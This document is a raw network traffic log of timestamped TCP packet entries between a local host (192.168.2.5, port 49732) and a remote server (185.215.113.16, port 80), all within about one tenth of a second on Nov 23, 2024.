                                                                                                                                                                                          Nov 23, 2024 17:44:33.302699089 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.303221941 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.303339005 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.303392887 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.304059982 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.304099083 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.304857969 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.304908037 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.304971933 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.305654049 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.305701017 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.305728912 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.306401968 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.306483984 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.306569099 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.306663990 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.307364941 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.307485104 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.307531118 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.308136940 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.308245897 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.308994055 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.309051991 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.309107065 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.309262991 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.309793949 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.309911966 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.310018063 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.310599089 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.310691118 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.310734987 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.311456919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.311580896 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.312267065 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.312328100 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.312339067 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.312494040 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.313057899 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.313116074 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.313288927 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.313884020 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.313992023 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.314042091 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.314721107 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.314817905 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.314945936 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.315536022 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.315670013 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.315740108 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.316744089 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.317040920 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.317101002 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.317861080 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.317950964 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.318228006 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.318495035 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.318531990 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.318783045 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.319403887 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.319556952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.319603920 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.320333958 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.320379019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.320981979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.321089029 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.321131945 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.321559906 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.321638107 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.322227001 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.322274923 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.322315931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.322921991 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.322983980 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.323110104 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.323262930 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.323817968 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.324009895 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.324465990 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.324770927 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.324788094 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.325165987 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.325593948 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.325660944 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.326019049 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.326338053 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.326440096 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.326510906 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.327119112 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.327219963 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.327258110 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.327907085 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.327970982 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.328017950 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.328743935 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.328870058 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.329567909 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.329616070 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.329691887 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.330380917 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.330614090 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.330668926 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.331226110 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.331357956 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.331408978 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.332057953 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.332175016 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.332299948 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.332858086 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.332906008 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.332962990 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.333853960 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.333972931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.334027052 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.334574938 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.334692955 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.334753990 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.335407972 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.335470915 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.335556984 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.336139917 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.336251974 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.336338997 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.336972952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.337078094 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.337129116 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.337789059 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.337888956 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.338028908 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.338648081 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.338768959 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.338926077 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.339463949 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.339766979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.339819908 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.340346098 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.340569019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.341104031 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.341260910 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.341312885 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.341312885 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.341960907 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.341999054 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.342058897 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.342757940 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.342858076 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.343048096 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.343579054 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.343720913 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.344024897 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.344436884 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.344501019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.344556093 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.345248938 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.345371962 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.345448017 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.346028090 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.346138000 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.346847057 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.346919060 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.346960068 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.347012997 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.347670078 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.347712994 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.347771883 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.348514080 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.348611116 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.348902941 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.349359989 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.349471092 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.349549055 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.350161076 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.350274086 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.350337982 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.350969076 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.351018906 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.351270914 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.351813078 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.351865053 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.351996899 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.352612019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.352669954 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.352885962 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.353421926 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.353552103 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.353614092 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.354224920 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.354355097 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.355060101 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.355114937 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.355160952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.355264902 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.355947971 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.356034994 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.356276989 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.356718063 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.356839895 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.357100964 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.357621908 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.357726097 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.357789040 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.358381033 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.358531952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.358665943 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.359191895 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.359273911 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.359466076 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.360075951 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.360189915 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.360250950 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.360872030 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.360960960 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.361013889 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.361676931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.361809969 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.362505913 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.362546921 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.362756968 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.363272905 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.363344908 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.363497019 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.363548994 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.364217997 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.364337921 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.365015030 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.365075111 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.365147114 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.365667105 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.365825891 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.365952969 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.366561890 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.366679907 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.366764069 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.366813898 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.367499113 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.367624044 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.367809057 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.368263960 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.368380070 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.368429899 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.369086027 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.369208097 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.369256973 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.369890928 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.369966030 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.371284962 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.372267008 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.372360945 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.372699022 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.372776985 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.372813940 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.373471022 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.373579979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.373641968 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.374336958 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.374696016 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.375178099 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.375232935 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.375278950 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.375963926 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.376087904 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.376132011 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.376178980 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.376785994 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.376894951 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.377033949 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.377603054 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.377665043 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.378443003 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.378490925 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.378509045 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.379237890 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.379262924 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.379357100 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.380064011 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.380165100 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.380218983 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.380912066 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.381031990 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.381091118 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.400203943 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.400301933 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.400439978 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.400448084 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.400558949 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.400609970 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:33.401181936 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.401345015 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:33.401388884 CET4973280192.168.2.5185.215.113.16
